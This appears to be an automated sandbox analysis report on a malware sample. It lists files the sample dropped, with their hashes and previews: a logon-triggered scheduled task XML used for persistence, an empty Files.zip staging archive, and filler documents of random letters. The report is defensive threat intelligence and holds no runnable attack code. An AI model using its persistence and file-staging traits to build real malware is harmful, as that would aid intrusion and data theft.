                                                                                      MD5:A94F197BDC1DA87510AD2CC4FCA814E4
                                                                                      SHA1:84E266B557FADEF97A94C8942A7FB5701E718B4A
                                                                                      SHA-256:C2BB9ED76A98B48FE529949FB409F2C2CE60D742C80E6118560CA062A7AA74C7
                                                                                      SHA-512:7F0656BA4EC8EFF09223AA638756B1DEF84D0D66B91C18EF406496DB33BABE209D8E05BFA00D9C266EAC8B99CC04553FC8BC1549C077F3C535EC36193C387F50
                                                                                      Malicious:true
                                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                                                                      C:\Users\user\AppData\Local\Temp\tmpFCC3.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:XML 1.0 document, ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):1583
                                                                                      Entropy (8bit):5.109374393038211
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt5Kxvn:cgergYrFdOFzOzN33ODOiDdKrsuTgv
                                                                                      MD5:A94F197BDC1DA87510AD2CC4FCA814E4
                                                                                      SHA1:84E266B557FADEF97A94C8942A7FB5701E718B4A
                                                                                      SHA-256:C2BB9ED76A98B48FE529949FB409F2C2CE60D742C80E6118560CA062A7AA74C7
                                                                                      SHA-512:7F0656BA4EC8EFF09223AA638756B1DEF84D0D66B91C18EF406496DB33BABE209D8E05BFA00D9C266EAC8B99CC04553FC8BC1549C077F3C535EC36193C387F50
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files.zip

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:Zip archive data (empty)
                                                                                      Category:dropped
                                                                                      Size (bytes):24
                                                                                      Entropy (8bit):1.4575187496394222
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:pjt/lC:NtU
                                                                                      MD5:98A833E15D18697E8E56CDAFB0642647
                                                                                      SHA1:E5F94D969899646A3D4635F28A7CD9DD69705887
                                                                                      SHA-256:FF006C86B5EC033FE3CAFD759BF75BE00E50C375C75157E99C0C5D39C96A2A6C
                                                                                      SHA-512:C6F9A09D9707B770DBC10D47C4D9B949F4EBF5F030B5EF8C511B635C32D418AD25D72EEE5D7ED02A96AEB8BF2C85491CA1AA0E4336D242793C886ED1BCDD910B
                                                                                      Malicious:false
                                                                                      Preview:PK......................

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files.zip~RF6fc7b9.TMP (copy)

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:Zip archive data (empty)
                                                                                      Category:dropped
                                                                                      Size (bytes):24
                                                                                      Entropy (8bit):1.4575187496394222
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:pjt/lC:NtU
                                                                                      MD5:98A833E15D18697E8E56CDAFB0642647
                                                                                      SHA1:E5F94D969899646A3D4635F28A7CD9DD69705887
                                                                                      SHA-256:FF006C86B5EC033FE3CAFD759BF75BE00E50C375C75157E99C0C5D39C96A2A6C
                                                                                      SHA-512:C6F9A09D9707B770DBC10D47C4D9B949F4EBF5F030B5EF8C511B635C32D418AD25D72EEE5D7ED02A96AEB8BF2C85491CA1AA0E4336D242793C886ED1BCDD910B
                                                                                      Malicious:false
                                                                                      Preview:PK......................

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\AFWAAFRXKO.docx

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.6868290294905215
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:hl+yWbugHn0w0RW4TAvC5oC6Rkc1ZqX+STxhexRov:hQhuTwqTAvIuOuQXVEov
                                                                                      MD5:E655D05DEDA782A6FE1E44028236D3A4
                                                                                      SHA1:ABEF573CA92D8CD16E5ACE5C300A6BF07DF79722
                                                                                      SHA-256:69FC1A8F39F8BD7E956A4C8EC0EC6210E8F4C7E223B49C20369A2B47F8512528
                                                                                      SHA-512:25837AEEB2772BF69684BDB344208188E115AA8FCB06D5428F84D2ED15F4972FC6874B128CA3682D28900F5C0EB8B305151F831962D3021EE7BBD1447DAE93F5
                                                                                      Malicious:false
                                                                                      Preview:AFWAAFRXKOIMYUTEBKLCFYUSMPKBLLVLYCZSBYQARRBIDNMYLPLGAIJYBPXZRRCDKWUJCZFNZYWJLJWCPPNWNBUNUKWKANAFJTGSMNDNAIPWYCCUGZTWCXIDUHLKDIIFXVZZCBKTKZXKYBFQHLHAZSPAYNVQVCNGPTZLFAFXAUGISISAIITTEUPNXLWBPAUSCWOXHRUCHKENHIUHQCSETCRINBBJCUJCYIOYZUPBJXJBLMSTCMXHMOOYHKSQGTGUNLEDPMCFDKWDGOSMWYQNXDCAOPAGZLPKXQZAOHSJXYLJUCZGAXOJOEPCWBHGGKSAPLRCJRDKCIWGATZZLSAOXFPFIENHFZCCEZCGGYAJEEPJFJLQIMPYUUETJJFOGGKKJKFAHPRMCUJNDGTXMLAAQDGEQMDULWDPCAUXZTYYGKAFFQQHIKQHEATUJZECMPTEBTRHCFGIZWCYGIGHIPVWFTPPXSNUTYHQCLGJLUYHHVMGFOMHJDNRGDZFHRGYQORTAJWLGOELYKCPIANQGCAXIZOMJZOECZGAHFWNUAKKTHLAANRBUSOZZLNWUYMXDOWPYUFYBOZZZBBJKPNMFGUCBOUWTXXWSNOBHKCPLGIWSWHHNCKLLLPPBPRJTKGRWMIZJYLWMDVWGJOTUQLYVUGUJQWNZKEUZQCQHKTCMGXBZDWEEFWYQHSYEMWFFVJUDOFEXELJGUUNXPBJCIQBKCMDGDRNTXYAXFDSLPAGXBTGBIVFXAHNXSFIPLCMCBKLQODIOGOBZMULDRUZUBRXZWXQVZCCWQVEIFCHMCTEYQXZKNSQZNYDUYGPGUQJEKUPPOTOWMMILZMISKYYGSRXUSSWEEQRNYBWLFXYWKGQPPVHKNOOXEDYWLCRNTNRKUIUKCYQNZCKIXAOIPCOTLEREPCLILYTQLFKBOOMXEVVODZEITSUPQITOXCNMSODLXIRGYOVFXWNRMVUQTMIZKKEVHOWKLXSZARGDNQKVXETZPBS

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\AFWAAFRXKO.pdf

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.6868290294905215
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:hl+yWbugHn0w0RW4TAvC5oC6Rkc1ZqX+STxhexRov:hQhuTwqTAvIuOuQXVEov
                                                                                      MD5:E655D05DEDA782A6FE1E44028236D3A4
                                                                                      SHA1:ABEF573CA92D8CD16E5ACE5C300A6BF07DF79722
                                                                                      SHA-256:69FC1A8F39F8BD7E956A4C8EC0EC6210E8F4C7E223B49C20369A2B47F8512528
                                                                                      SHA-512:25837AEEB2772BF69684BDB344208188E115AA8FCB06D5428F84D2ED15F4972FC6874B128CA3682D28900F5C0EB8B305151F831962D3021EE7BBD1447DAE93F5
                                                                                      Malicious:false
                                                                                      Preview:AFWAAFRXKOIMYUTEBKLCFYUSMPKBLLVLYCZSBYQARRBIDNMYLPLGAIJYBPXZRRCDKWUJCZFNZYWJLJWCPPNWNBUNUKWKANAFJTGSMNDNAIPWYCCUGZTWCXIDUHLKDIIFXVZZCBKTKZXKYBFQHLHAZSPAYNVQVCNGPTZLFAFXAUGISISAIITTEUPNXLWBPAUSCWOXHRUCHKENHIUHQCSETCRINBBJCUJCYIOYZUPBJXJBLMSTCMXHMOOYHKSQGTGUNLEDPMCFDKWDGOSMWYQNXDCAOPAGZLPKXQZAOHSJXYLJUCZGAXOJOEPCWBHGGKSAPLRCJRDKCIWGATZZLSAOXFPFIENHFZCCEZCGGYAJEEPJFJLQIMPYUUETJJFOGGKKJKFAHPRMCUJNDGTXMLAAQDGEQMDULWDPCAUXZTYYGKAFFQQHIKQHEATUJZECMPTEBTRHCFGIZWCYGIGHIPVWFTPPXSNUTYHQCLGJLUYHHVMGFOMHJDNRGDZFHRGYQORTAJWLGOELYKCPIANQGCAXIZOMJZOECZGAHFWNUAKKTHLAANRBUSOZZLNWUYMXDOWPYUFYBOZZZBBJKPNMFGUCBOUWTXXWSNOBHKCPLGIWSWHHNCKLLLPPBPRJTKGRWMIZJYLWMDVWGJOTUQLYVUGUJQWNZKEUZQCQHKTCMGXBZDWEEFWYQHSYEMWFFVJUDOFEXELJGUUNXPBJCIQBKCMDGDRNTXYAXFDSLPAGXBTGBIVFXAHNXSFIPLCMCBKLQODIOGOBZMULDRUZUBRXZWXQVZCCWQVEIFCHMCTEYQXZKNSQZNYDUYGPGUQJEKUPPOTOWMMILZMISKYYGSRXUSSWEEQRNYBWLFXYWKGQPPVHKNOOXEDYWLCRNTNRKUIUKCYQNZCKIXAOIPCOTLEREPCLILYTQLFKBOOMXEVVODZEITSUPQITOXCNMSODLXIRGYOVFXWNRMVUQTMIZKKEVHOWKLXSZARGDNQKVXETZPBS

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\AIXACVYBSB.pdf

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.690067217069288
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:wSQanHEC73FqjThUbJwuUn5qPyd2whRZfZOaH5KrqXzJI/y5bjbVMmRYAPL8fx7T:wHu73FWhUNwzqq2OfX82JdHRNPLcxdl
                                                                                      MD5:4E32787C3D6F915D3CB360878174E142
                                                                                      SHA1:57FF84FAEDF66015F2D79E1BE72A29D7B5643F47
                                                                                      SHA-256:2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269
                                                                                      SHA-512:CEC75D7CCFA70705732826C202D144A8AC913E7FCFE0D9B54F6A0D1EEC3253B6DEFFB91E551586DA15F56BA4DE8030AC23EE28B16BB80D1C5F1CB6BECF9C21BE
                                                                                      Malicious:false
                                                                                      Preview:AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGULFHOTUOYUSIVJEHUYPRYGESSFFMBWDPFRMTVBZEHTJSPRMDJISAZPMEWNGPGIXXTDNHCOBSXAWEFWRZNECKZGORELWMEPSAPLSTZZPUKXURSKTFSUSFEZMXMAIMRJZNGCVKLOHPVMZEIXIISXVMQHQTSADYWZQSWYVJHHONOOSZPQVWIUFMVXBXYCJOMERCQSVXERFAOOENLKARQGTECAIXOXEZPFDFJHYFCKLADMCWYOMCITRHMECVVVNPNTSRXYGYRKZUTOFNBMHDZWYHPYLTWEIGWOIGBTHWYGIXBCUDYMZMTZNYQMZLMXKPNFZDUEXXQLFJZZZVOPBEZKTKTJCTNUPRCNNGCPTIHKPTGBJLGUENNUGTZVMZJGQGUVBRLOJZECBLINEKGSIRFWZPWMVYJNEPWGYIAHKMJRBZMRVIBPONMHBDQZYFBHDDMYBZZAFEPAQFFUPIGGYNSPVXUWNNCWAUZXAGCATPNHNNYICDCRMTKRODUCDDFZKHLISLVOIFZPDTOSIEREFHYEWUBJKJRWXMZUGCPUXCPEXUQPWTSKEYSDPEICDQMMKUKJLDNQEHQQCYKRMWOUSJVTVSZJTFZCDVNUMEIZFWDNWCNCSCHBYNKRUSXPVMRIHGXDUPKXMZUIELSRXMZAEUNCCYZTEYLUYYRNSFUTHFESJOLGKJVGGNVJKSFSETAIHYOMLBOPRYAHSCATJUXNTWVZPEMECBVVHKHDELQRTQBEBXPJJ

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\AIXACVYBSB.xlsx

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.690067217069288
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:wSQanHEC73FqjThUbJwuUn5qPyd2whRZfZOaH5KrqXzJI/y5bjbVMmRYAPL8fx7T:wHu73FWhUNwzqq2OfX82JdHRNPLcxdl
                                                                                      MD5:4E32787C3D6F915D3CB360878174E142
                                                                                      SHA1:57FF84FAEDF66015F2D79E1BE72A29D7B5643F47
                                                                                      SHA-256:2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269
                                                                                      SHA-512:CEC75D7CCFA70705732826C202D144A8AC913E7FCFE0D9B54F6A0D1EEC3253B6DEFFB91E551586DA15F56BA4DE8030AC23EE28B16BB80D1C5F1CB6BECF9C21BE
                                                                                      Malicious:false
                                                                                      Preview:AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGULFHOTUOYUSIVJEHUYPRYGESSFFMBWDPFRMTVBZEHTJSPRMDJISAZPMEWNGPGIXXTDNHCOBSXAWEFWRZNECKZGORELWMEPSAPLSTZZPUKXURSKTFSUSFEZMXMAIMRJZNGCVKLOHPVMZEIXIISXVMQHQTSADYWZQSWYVJHHONOOSZPQVWIUFMVXBXYCJOMERCQSVXERFAOOENLKARQGTECAIXOXEZPFDFJHYFCKLADMCWYOMCITRHMECVVVNPNTSRXYGYRKZUTOFNBMHDZWYHPYLTWEIGWOIGBTHWYGIXBCUDYMZMTZNYQMZLMXKPNFZDUEXXQLFJZZZVOPBEZKTKTJCTNUPRCNNGCPTIHKPTGBJLGUENNUGTZVMZJGQGUVBRLOJZECBLINEKGSIRFWZPWMVYJNEPWGYIAHKMJRBZMRVIBPONMHBDQZYFBHDDMYBZZAFEPAQFFUPIGGYNSPVXUWNNCWAUZXAGCATPNHNNYICDCRMTKRODUCDDFZKHLISLVOIFZPDTOSIEREFHYEWUBJKJRWXMZUGCPUXCPEXUQPWTSKEYSDPEICDQMMKUKJLDNQEHQQCYKRMWOUSJVTVSZJTFZCDVNUMEIZFWDNWCNCSCHBYNKRUSXPVMRIHGXDUPKXMZUIELSRXMZAEUNCCYZTEYLUYYRNSFUTHFESJOLGKJVGGNVJKSFSETAIHYOMLBOPRYAHSCATJUXNTWVZPEMECBVVHKHDELQRTQBEBXPJJ

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\KATAXZVCPS.pdf

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.699548026888946
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                      MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                      SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                      SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                      SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                      Malicious:false
                                                                                      Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\LSBIHQFDVT.docx

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.698193102830694
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
                                                                                      MD5:78472D7E4F5450A7EA86F47D75E55F39
                                                                                      SHA1:D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
                                                                                      SHA-256:2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
                                                                                      SHA-512:D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
                                                                                      Malicious:false
                                                                                      Preview:LSBIHQFDVTSVVGEDSWPTOHLTEVYTSYUFESYWTQBFWWMHNBBEMBVMOFMZTMOHDQNCKKHKYRTCMCFSQHGYBSVKMOQQLLCPQZHKDOPBFGDVPYZVWAADJMJUDTGESJIJSIQZHWSKSIHTTLYRSZAUESRQOTVVODESFYDOSXVOSTUCUVRNFBAMHCVWDUZQFCHRONJGZADAUMSGTNUNYSJEYNAJVNHGNGEKEHFUHSWMPSTLDYTFLOUMEMBIOUMUQYVMXXUSQSJYMKPGRXNZNRQHYVNDPSJDMHHNJONALSNANDEAVHLRUPZWQZSUYKUNRGQKLVUFPNDCKWWBQHGNPLZWXZSMUEQMMVQATLEMDSGIBYTRQPDWMWCCPYAGXWODOAEXALYTURUVPQJZXUJNOZGFZASLIHIVVBQZYVLEIKGCCPNMMGMIBNZIGEAQZMKNAFRLUXOVVSCZFIZNIPVFFBXOTERXCQGMZIJJKDCRYFXCYFAPTPKLXEFWZKTOELZUOLCVEONVZUAOJTZVWUJWFPFUDVPHTTGKXHDSORYETAETDBZAWMPROUKXLMNPWEGGSTJGSGHJQEGHMKRIVKCSQQGLVWFOIBALTKZNZJKTVRHAUXODFVCAVHPPOMBIWHOJVPZHSRBNBWYKRTOJBZPFGIYJCKLLAKNNAOGERLLVXJLHSWDWQWYHKSOFVCMZYBNMNLGPJOILDGZXVYEWKJBWZQHSWDZWSZLBQIBWYRMMXSCPZOJNGUIEEGKJNLYCUVISYUKUZGGZJDVPNOYOFMAODKVQWRASSESZPGLAOUYYCSGNALLRLRODYFLJIZINLFQABYEGICCVXPUWRNWLWBEOBPSPLAWNUWCLXTGHIRGLZZTTJLXIYMCQWBYXIFLVPGIWZEPOQQLQCCZQTITKAMQMYEMNRHVDWXFLMRDFHDTFKTGYONHYUGKCISPDNCPWHZCRMEJKHTUBTLHNJJVOYIWLKBNFOTHVXQJRGQARLJFNBAJTTVFM

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\LSBIHQFDVT.xlsx

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.698193102830694
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
                                                                                      MD5:78472D7E4F5450A7EA86F47D75E55F39
                                                                                      SHA1:D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
                                                                                      SHA-256:2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
                                                                                      SHA-512:D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
                                                                                      Malicious:false
                                                                                      Preview:LSBIHQFDVTSVVGEDSWPTOHLTEVYTSYUFESYWTQBFWWMHNBBEMBVMOFMZTMOHDQNCKKHKYRTCMCFSQHGYBSVKMOQQLLCPQZHKDOPBFGDVPYZVWAADJMJUDTGESJIJSIQZHWSKSIHTTLYRSZAUESRQOTVVODESFYDOSXVOSTUCUVRNFBAMHCVWDUZQFCHRONJGZADAUMSGTNUNYSJEYNAJVNHGNGEKEHFUHSWMPSTLDYTFLOUMEMBIOUMUQYVMXXUSQSJYMKPGRXNZNRQHYVNDPSJDMHHNJONALSNANDEAVHLRUPZWQZSUYKUNRGQKLVUFPNDCKWWBQHGNPLZWXZSMUEQMMVQATLEMDSGIBYTRQPDWMWCCPYAGXWODOAEXALYTURUVPQJZXUJNOZGFZASLIHIVVBQZYVLEIKGCCPNMMGMIBNZIGEAQZMKNAFRLUXOVVSCZFIZNIPVFFBXOTERXCQGMZIJJKDCRYFXCYFAPTPKLXEFWZKTOELZUOLCVEONVZUAOJTZVWUJWFPFUDVPHTTGKXHDSORYETAETDBZAWMPROUKXLMNPWEGGSTJGSGHJQEGHMKRIVKCSQQGLVWFOIBALTKZNZJKTVRHAUXODFVCAVHPPOMBIWHOJVPZHSRBNBWYKRTOJBZPFGIYJCKLLAKNNAOGERLLVXJLHSWDWQWYHKSOFVCMZYBNMNLGPJOILDGZXVYEWKJBWZQHSWDZWSZLBQIBWYRMMXSCPZOJNGUIEEGKJNLYCUVISYUKUZGGZJDVPNOYOFMAODKVQWRASSESZPGLAOUYYCSGNALLRLRODYFLJIZINLFQABYEGICCVXPUWRNWLWBEOBPSPLAWNUWCLXTGHIRGLZZTTJLXIYMCQWBYXIFLVPGIWZEPOQQLQCCZQTITKAMQMYEMNRHVDWXFLMRDFHDTFKTGYONHYUGKCISPDNCPWHZCRMEJKHTUBTLHNJJVOYIWLKBNFOTHVXQJRGQARLJFNBAJTTVFM

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\MNULNCRIYC.xlsx

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.704010251295094
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:/j/sfpWFBIirMexXYVw/K9dKAkzFeHx1x21g4kug4c7xy:/j/vBDZxXYVw/KXjHx/4kuUxy
                                                                                      MD5:DF05C5F93419C56BFE3A84BDCC929382
                                                                                      SHA1:36AABBCD46C0F368E18FA602E486816D2578F48E
                                                                                      SHA-256:F7116531006BD0A5DEE64436C66CE5487C662F72BFBCD235C7407FBF2A3278DE
                                                                                      SHA-512:EB50E34AA5EE92A7C90AA5BCE11F0693AFAC73C26B04AF9C676E15A24813C52EAF09A4EA3F6490223CABCDB3EB6277E74CB6FF288D3D1871F14B410E950656BA
                                                                                      Malicious:false
                                                                                      Preview:MNULNCRIYCLQPFRTTBIRJXLLXDPOIGHIWSMRZAWOWMFPIGBQDOQPBHCVDNAEFVPPKLZOIKPKFYDTDOGMSIUWATNOJJJSNKBWJHKKWMUZDRGJJNWUASOTXKYYIZLCOHDOBJPMAPIXVROTWYIYRPFZWZLECCXJOFYKKMMQGDBCRRZBEIALJQWFBIRGZWKKZNILSZURIFNVYXWPHRMYGXATLINJURPYVWCXYNUAESGKBUAMJTBBSVQQAIZKUVJSGVILJMHXCRFQYYXESEYBSMBQEHOEREHZFHPFENYHMHULCMQJKSSZLDDCMPWESAOKZQCENLMVXZGUVHNVUKXEWENTAXUEHCWCADQIRNYDFQPSQSUSDTQUVKPDYTOYMXIFXIMYDOEFHNJDKHPJDUFNMBXUSNDPQKBSTIVTXYHJYKOGCJMZHQRQQDXTWGEMBAJZIDXHPCGJTNITUFATHMPLPFJLWOPXNLVVCCPOQFCWKUCSSMFUWUXSMBYFBMUPJSINHRBJCPPQTSNUWCSGVBNMGEVXSQAUHMBGCNHVBRKKXPGDWRHAWFZYIGXLNCPKSLAZERFWOQNQAXTGZOWNEPLIJOXTLEMUDNYMQCRGFNMOCSUXSKKUKSNFLMUYAVMFWVWOEHAYJWOLYNYYTGSCYSYAJVUNEZQYLOBOCROMKWXPJGQVMSTNKYJEQCUQCBVMAJBOALKJAPYUEVMIWWFMSPLPSKKZMKNEKPQGDNBVBYHNPDIQEEKXUZLGWXQGDQZEHBMYYFUDFGNLYGARBRCREXIQUUWFEXDYINDKFJACYETJBANLSCEYWEBIPFZEOGUWOHBPBFLDAELAEPFOIZRSYWISCBUYPUAHWUVAIRDXHGXUQNAEDFFRDSODQFGQLGCIHSIWHVUDCTSMIQTMXSFNUPKSLBDPGVPMZPHIEMSXUQSRIGGMHVDMGMPEPCJPZBENUEBMZNZVWTRCVAGRSYRBZLOAETCXTWCINHSWQQFCHATVQRGJ

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ONBQCLYSPU.pdf

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
